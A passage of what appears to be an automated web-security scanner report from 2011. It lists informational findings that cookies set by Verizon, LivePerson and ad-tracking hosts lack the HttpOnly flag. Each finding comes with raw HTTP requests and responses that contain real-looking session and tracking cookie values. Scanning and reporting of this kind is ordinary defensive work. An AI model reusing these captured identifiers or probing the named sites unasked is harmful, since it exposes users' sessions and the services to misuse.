Date: Mon, 05 Sep 2011 22:42:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=KQfyhK9qeUc=&H=&I=&J=JxCF029RF/U=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:50 GMT; path=/media

...<?xml version="1.0" encoding="utf-8"?>
<Response creationDate="9/5/2011 6:01:02 AM">
<Results>
<Group id="VZMediaDefault" entitlement="HBO,Starz Play,Showtime,ABC Sneak Peeks,Smithsonian C
...[SNIP]...

10.78. http://media.verizon.com/media/scripts/widget.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.verizon.com
Path:	/media/scripts/widget.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:23 GMT; path=/media

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/scripts/widget.ashx?widget=vzNews&container=vzNewsWidget HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 143025
Date: Mon, 05 Sep 2011 22:41:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:23 GMT; path=/media

/* widget.ashx code generated : 9/5/2011 10:41:23 PM; valid until: 9/5/2011 5:42:21 PM */
var vzWidgetsBaseURI = 'http://media.verizon.com/media',
vzWidgetsSignedIn = false;

/* files consolidated
...[SNIP]...

10.79. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1315260879; domain=.mathtag.com; path=/; expires=Tue, 04-Sep-2012 22:14:39 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=101633&mt_adid=100302&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: uuid=4e394470-3e17-879f-6d77-411115d4b5ad; ts=1315139242; mt_mop=10008:1315139190|2:1315139242|5:1315061038|4:1313678521|10001:1312768945|10002:1313678517

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6809 26633
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 05 Sep 2011 22:14:39 GMT
Connection: Keep-Alive
Set-Cookie: ts=1315260879; domain=.mathtag.com; path=/; expires=Tue, 04-Sep-2012 22:14:39 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.80. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=9033442320916087634; Domain=.turn.com; Expires=Sat, 03-Mar-2012 22:14:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?&b2=zWOV_b2-olxW30r-HvgJ-W8JL5NcaiTtCBKWjV3AS6GHDRKM8X_rBRqVIW4_D0WxJkwj0wgBX_MIOECGKTmV8g&jsb=1&cid=&rnd=0.3133519586570117 HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=9033442320916087634; Domain=.turn.com; Expires=Sat, 03-Mar-2012 22:14:41 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 05 Sep 2011 22:14:40 GMT

GIF89a.............!.......,...........D..;

10.81. http://s.xp1.ru4.com/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X1ID=BC-00000000964218310; domain=.ru4.com; path=/; expires=Mon, 05-Mar-2013 18:19:21 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click?_o=15772&_n=62795&_c=1621610&_x=17344902&_b=17344904&_d=17345346&_g=17345335&_a=17344945&_p=1621613&_s=0&_pm=17344948&_pn=2&_pl=0&redirect=http://s.xp1.ru4.com/images/pixel.gif HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:19:21 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
X-Cnection: close
Pragma: no-cache
Set-cookie: X1ID=BC-00000000964218310; domain=.ru4.com; path=/; expires=Mon, 05-Mar-2013 18:19:21 GMT
Set-cookie: O15772=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Location: http://s.xp1.ru4.com/images/pixel.gif
Content-length: 0

10.82. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

997910-B997917=0|0|0|0|0|997915|997914|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=15772&_t=behavioral&ssv_002=tv HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 1621610-B22941263=0|0|0|0|0|22946267|22946266|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:18:40 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 997910-B997917=0|0|0|0|0|997915|997914|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 26
X-Cnection: close

var xp1_behavioral = true;

10.83. http://s.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1621610-B22941263=0|0|0|0|0|22946267|22946266|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=15772&_t=ghp&ssv_random=27&ssv_callback=SetXP1Placements&ssv_003=&ssv_004=&ssv_005=&ssv_006=&ssv_007=&ssv_008=&ssv_009=&ssv_010=&ssv_011=&ssv_012=0&ssv_013=0&ssv_014=807&ssv_015=&ssv_016= HTTP/1.1
Host: s.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; M62795-97956=1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:14:30 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1621610-B22941263=0|0|0|0|0|22946267|22946266|-1; domain=.ru4.com; path=/
Set-cookie: P15772=; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Content-type: text/html
Content-length: 1487
X-Cnection: close

SetXP1Placements({
"xp1_placement1": {
"creativeID": "GHP_OT_HSIDL3M_DEF",
"clickURL": "http://s.xp1.ru4.com/click?_o=15772&_n=62795&_c=1621610&_x=17344902&_b=17344904&_d=0
...[SNIP]...

10.84. http://sales.liveperson.net/hc/2329305/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2329305/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=6796449846042111086; path=/hc/2329305
HumanClickACTIVE=1315261003173; expires=Tue, 06-Sep-2011 22:16:43 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2329305/?&site=2329305&cmd=mTagKnockPage&lpCallId=414141118060-530569466296&protV=20&lpjson=1&id=4139350678&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sb_com-sales-english-1%7ClpMTagConfig.db1%7CLP_button_div1%7C%23chat-sb_com-sales-english-2%7ClpMTagConfig.db1%7CLP_button_div2%7C%23chat-sb_com-sales-english-3%7ClpMTagConfig.db1%7CLP_button_div3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315260965504

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6796449846042111086; path=/hc/2329305
Set-Cookie: HumanClickACTIVE=1315261003173; expires=Tue, 06-Sep-2011 22:16:43 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:16:43 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 30470

lpConnLib.Process({"ResultSet": {"lpCallId":"414141118060-530569466296","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.85. http://sales.liveperson.net/hc/2329305/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2329305/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1315261068626; expires=Tue, 06-Sep-2011 22:17:48 GMT; path=/
HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
LivePersonID=-5110247826455-1315261068:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:17:48 GMT; path=/hc/2329305; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2329305/?&site=2329305&cmd=mTagKnockPage&lpCallId=958318216958-922708770026&protV=20&lpjson=1&id=883688300&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sb_com-sales-english-1%7ClpMTagConfig.db1%7CLP_button_div1%7C%23chat-sb_com-sales-english-2%7ClpMTagConfig.db1%7CLP_button_div2%7C%23chat-sb_com-sales-english-3%7ClpMTagConfig.db1%7CLP_button_div3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/overview.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7744157426393992956; LivePersonID=-5110247826455-1315261003:-1:-1:-1:-1; HumanClickSiteContainerID_2329305=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ; HumanClickACTIVE=1315261015841

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315261068626; expires=Tue, 06-Sep-2011 22:17:48 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:17:48 GMT
Set-Cookie: HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
Set-Cookie: LivePersonID=-5110247826455-1315261068:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:17:48 GMT; path=/hc/2329305; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 30470

lpConnLib.Process({"ResultSet": {"lpCallId":"958318216958-922708770026","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.86. http://sales.liveperson.net/hc/2329305/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2329305/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LivePersonID=-5110247826455-1315261011:0; expires=Tue, 04-Sep-2012 22:16:51 GMT; path=/hc/2329305; domain=.liveperson.net
HumanClickKEY=5729159524233474328; path=/hc/2329305
HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
LivePersonID=-5110247826455-1315261011:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:16:51 GMT; path=/hc/2329305; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2329305/?&site=2329305&cmd=mTagStartPage&lpCallId=262428231537-506367190275&protV=20&lpjson=1&page=http%3A//www.verizonbusiness.com/Medium/&id=1569842908&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-verizon-medium-english&activePlugin=none&cobrowse=true&PV%21unit=verizon-medium&PV%21Section=Home&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21CountrySelected=xg&title=Home%20-%20Verizon%20Medium%20Business&referrer=http%3A//www22.verizon.com/content/verizonglobalhome/ghp_business.aspx&cobrowse=true&cookie=BERT%3DVRID%253d6e76b61a-0caa-4f5d-9d01-7a634d977972%7CVTID%253de8396f11-b89c-4b23-a26b-edc20acf7fae%7CSX%253d1315262200%7CVP%253d1%7CRMC%253dxg%7CLP%253den%3B%20__utma%3D58777642.1910521591.1315279004.1315279004.1315279004.1%3B%20__utmb%3D58777642.2.10.1315279004%3B%20__utmc%3D58777642%3B%20__utmz%3D58777642.1315279004.1.1.utmcsr%3Dwww22.verizon.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/content/verizonglobalhome/ghp_business.aspx HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7744157426393992956; LivePersonID=-5110247826455-1315261003:-1:-1:-1:-1; HumanClickSiteContainerID_2329305=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ; HumanClickACTIVE=1315261005680

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315261011:0; expires=Tue, 04-Sep-2012 22:16:51 GMT; path=/hc/2329305; domain=.liveperson.net
Set-Cookie: HumanClickKEY=5729159524233474328; path=/hc/2329305
Set-Cookie: HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
Set-Cookie: LivePersonID=-5110247826455-1315261011:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:16:51 GMT; path=/hc/2329305; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:16:51 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"262428231537-506367190275","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

10.87. http://sales.liveperson.net/hc/2329305/cmd/url/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2329305/cmd/url/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
LivePersonID=-5110247826455-1315261003:-1:1315261074:-1:-1; expires=Tue, 04-Sep-2012 22:23:18 GMT; path=/hc/2329305; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2329305/cmd/url/?site=2329305&SV!click-query-name=chat-sb_com-sales-english-2&SV!click-query-room=chat-sb_com-sales-english-2&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//sales.liveperson.net/hc/2329305/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D2329305%26SV%21chat-button-name%3Dchat-sb_com-sales-english-2%26SV%21chat-button-room%3Dchat-sb_com-sales-english-2%26referrer%3D%28button%2520dynamic-button%3Achat-sb_com-sales-english-2%28Business%2520Phone%2520Plans%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Service%2520%257C%2520Verizon%2520Voice%29%29%2520http%253A//smallbusiness.verizon.com/products/voice/plans.aspx&id=1535582035&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1315279372239 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7744157426393992956; LivePersonID=-5110247826455-1315261003:-1:1315261074:-1:-1; HumanClickSiteContainerID_2329305=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ; ASPSESSIONIDSQDBATSC=LPFNAFOBBADLNADJGJPHJDMH; HumanClickACTIVE=1315261349848

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Sep 2011 22:23:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2329305=STANDALONE; path=/hc/2329305
Set-Cookie: LivePersonID=-5110247826455-1315261003:-1:1315261074:-1:-1; expires=Tue, 04-Sep-2012 22:23:18 GMT; path=/hc/2329305; domain=.liveperson.net
Location: http://sales.liveperson.net/hc/2329305/?cmd=file&file=visitorWantsToChat&site=2329305&SV!chat-button-name=chat-sb_com-sales-english-2&SV!chat-button-room=chat-sb_com-sales-english-2&referrer=(button%20dynamic-button:chat-sb_com-sales-english-2(Business%20Phone%20Plans%20%7C%20Local%20%26%20Long%20Distance%20Service%20%7C%20Verizon%20Voice))%20http%3A//smallbusiness.verizon.com/products/voice/plans.aspx
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0

10.88. http://sales.liveperson.net/hc/44153975/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/44153975/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=1079782148047996108; path=/hc/44153975
HumanClickACTIVE=1315260925061; expires=Tue, 06-Sep-2011 22:15:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/44153975/?lpCallId=681711290471-672671612237&protV=20&lpjson=1&site=44153975&cmd=mTagKnockPage&id=6680413031&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-persistent-consumer-english%7ClpMTagConfig.dbPersistent%7ClpButtonPersistent%7C%23generic-consumer-english%7ClpMTagConfig.dbDual%7Clpchatdynamicbuttondiv%7C&cookie=GLOBALID%3DtWRJzfV%252FzyamDVoURNGmO7smtgitROzrsjFa48jF8jyYMlJxx5Bllp8fvpJxcQO4%3B%20%20mbox%3Dcheck%23true%231315278966%7Csession%231315278871714-190238%231315280766%7CPC%231315278871714-190238.19%231316488506%3B%20gnVersion%3D2011Jul31030844%3B%20CP%3Dnull* HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
Cookie: LivePersonID=LP i=546022977410,d=1312768968

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:15:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=1079782148047996108; path=/hc/44153975
Set-Cookie: HumanClickACTIVE=1315260925061; expires=Tue, 06-Sep-2011 22:15:25 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:15:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27926

lpConnLib.Process({"ResultSet": {"lpCallId":"681711290471-672671612237","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.89. http://sales.liveperson.net/hc/44153975/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/44153975/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1315261007076; expires=Tue, 06-Sep-2011 22:16:47 GMT; path=/
HumanClickSiteContainerID_44153975=Master; path=/hc/44153975
LivePersonID=-5110247826455-1315260966:-1:1315237110:-1:-1; expires=Tue, 04-Sep-2012 22:16:47 GMT; path=/hc/44153975; domain=.liveperson.net

